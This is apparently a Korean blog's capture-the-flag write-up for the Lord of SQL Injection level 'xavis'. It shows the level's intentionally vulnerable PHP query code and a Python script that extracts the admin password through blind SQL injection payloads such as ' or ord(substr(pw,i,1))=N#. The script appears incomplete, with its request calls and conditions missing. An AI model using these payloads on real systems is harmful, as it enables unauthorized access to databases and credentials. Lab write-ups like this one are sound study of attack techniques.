<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis");
highlight_file(__FILE__);
?>
Xavis 코드
Get방식으로 pw의 값을 받고
regex, like 가 필터링 되어있음
query문
select id from prob_xavis where id='admin' and pw='입력 값'
pw의 길이는 40자
근데 substr으로 했을 때 모두 0으로 나옴
찾아보니 pw가 유니코드로 되있다고함
한 글자가 4바이트니까
실제 pw의 길이는 유니코드 10자
그래서 substr을 ord로 감싸 유니코드 값을 찾음
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
import requests
cookie = {"PHPSESSID": ""}
session = requests.Session()
pwLen = 0
pw = ""
for i in range(50):
params = {
"pw":"' or length(pw)={}#".format(i)
}
pwLen = i
print("pwLen is", i,"!!!!!!")
break
print(i, "is not")
for i in range(1, pwLen//4+1):
for j in range(257):
params={
"pw":"' or ord(substr(pw,{},1))={}#".format(i,hex(j))
}
pw += chr(j)
print(chr(j),"correct!!!!!!!!!")
break
print(chr(j), "is not")
print("PW is",pw)
|
Xavis Clear
'Wargame, CTF > LOS_eagle' 카테고리의 다른 글
LOS _Iron_golem (0) | 2020.03.16 |
---|---|
LOS _Dragon (0) | 2020.03.16 |
LOS _nightmare (0) | 2019.12.02 |
LOS _succubus (0) | 2019.11.21 |
LOS _zombie_assassin (0) | 2019.11.08 |